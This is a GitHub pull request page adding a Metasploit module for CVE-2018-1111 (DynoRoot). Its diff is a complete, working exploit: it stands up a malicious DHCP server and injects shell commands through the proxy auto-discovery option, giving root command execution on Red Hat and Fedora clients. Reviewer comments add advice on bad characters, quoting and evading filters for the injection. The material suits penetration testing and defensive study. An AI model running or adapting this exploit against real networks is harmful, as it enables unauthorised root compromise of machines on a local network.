-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add CVE-2018-1111 exploit #10059
Add CVE-2018-1111 exploit #10059
Changes from 3 commits
164f3ef
f1b9088
8f02423
35ee1b5
0951aca
599979b
1efa5c4
6d0c6a7
b0f5566
4bf259e
d9d2263
f2549a1
c665a32
93e9c96
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,75 @@ | ||
## | ||
# This module requires Metasploit: http://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'rex/proto/dhcp' | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Already required in the mixin. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Removed. Good catch! |
||
|
||
class MetasploitModule < Msf::Exploit::Remote | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Exploit::Remote::DHCPServer | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'DHCP Client Command Injection (DynoRoot)', | ||
'Description' => %q{ | ||
This module exploits the DynoRoot vulnerability, a flaw in how the | ||
NetworkManager integration script included in the DHCP client in | ||
Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier | ||
processes DHCP options. A malicious DHCP server, or an attacker on | ||
the local network able to spoof DHCP responses, could use this flaw | ||
to execute arbitrary commands with root privileges on systems using | ||
NetworkManager and configured to obtain network configuration using | ||
the DHCP protocol. | ||
}, | ||
'Author' => | ||
[ | ||
'Felix Wilhelm', # Vulnerability discovery | ||
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'Platform' => ['unix'], | ||
'Arch' => ARCH_CMD, | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. You can add a There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Fixed |
||
'References' => | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Feel free to include your own PoC in this array. :) There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd add an There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Added |
||
[ | ||
['CVE', '2018-1111'], | ||
['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'], | ||
['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'], | ||
['URL', 'https://dynoroot.ninja/'], | ||
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'], | ||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111'] | ||
], | ||
'Payload' => | ||
{ | ||
# 255 for a domain name, minus some room for encoding | ||
'Space' => 200, | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd have to check the RFC(s), but does this still apply to options? There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Based on RFC2132, seems like it does not.
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Cool, didn't think so. Phew! |
||
'DisableNops' => true, | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Speaking of space, I'm pretty sure this doesn't apply. Nothing to pad with NOPs. This thing doesn't even need NOPs. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Removed |
||
'Compat' => | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd remove this hash altogether. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Removed this for |
||
{ | ||
'PayloadType' => 'cmd', | ||
} | ||
}, | ||
'Targets' => [ [ 'Automatic Target', { }] ], | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => 'May 15 2018' | ||
)) | ||
|
||
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL') | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Might be more to deregister here, such as any PXE options. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'll remove FILENAME related to PXE, don't know that any of the others like DHCPIP start and end, BROADCAST, ROUTER, etc. are related to PXE There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Removed FILENAME, others didn't seem like they were related to PXE in show options or show advanced There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Cool, thanks. |
||
end | ||
|
||
def exploit | ||
hash = datastore.copy | ||
start_service(hash) | ||
@dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #") | ||
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Feels like you'd have some badchars from the injection. Would be worthwhile to perform badchar analysis and then update There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Do you have any suggestions for how to perform that analysis? Unlike a buffer overflow where I can investigate the registers, I don't have a good sense of how I'd do that with a command injection like this There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I'd start by looking at my injection and eliminating as many shell metacharacters or otherwise "breaking" characters as I can. Then I'd encode away the remaining ones, escape them, quote them, comment them out, or match them. Then I'd verify with It really depends on the vuln, the environment, and the payload. Hope this helps. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I didn't dig into this vuln deeply yet, but judging by the injection used here, you shouldn't have to worry about too many badchars. Appears a string is being completed (matched quotes), previous command backgrounded, payload injected, and everything else commented out. It's a tried-and-true technique. You can probably randomize the There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Another thing to watch out for is if you have badchars in the protocol or otherwise over the wire. Sometimes your injection can look solid from the software side but get messed up on the networking side. Lastly, you may want to account for software or network protections. Something like a WAF would have to be evaded. I don't think that's much of a concern here. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Good bot. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Added a randomization on the There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. It's almost certainly not capped at one byte either. Might want to use a longer random-length random string. There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. I was under the impression that Edit Apparently space is no longer a concern, in which case: There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
A few different manual tests I've been doing to see if some shell functionality does or doesn't work:
Worked and felt relatively contrived in their design, trying to hit many different types of command characters |
||
|
||
begin | ||
while @dhcp.thread.alive? | ||
sleep 2 | ||
end | ||
ensure | ||
stop_service | ||
end | ||
end | ||
end | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
https
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fixed, good eye!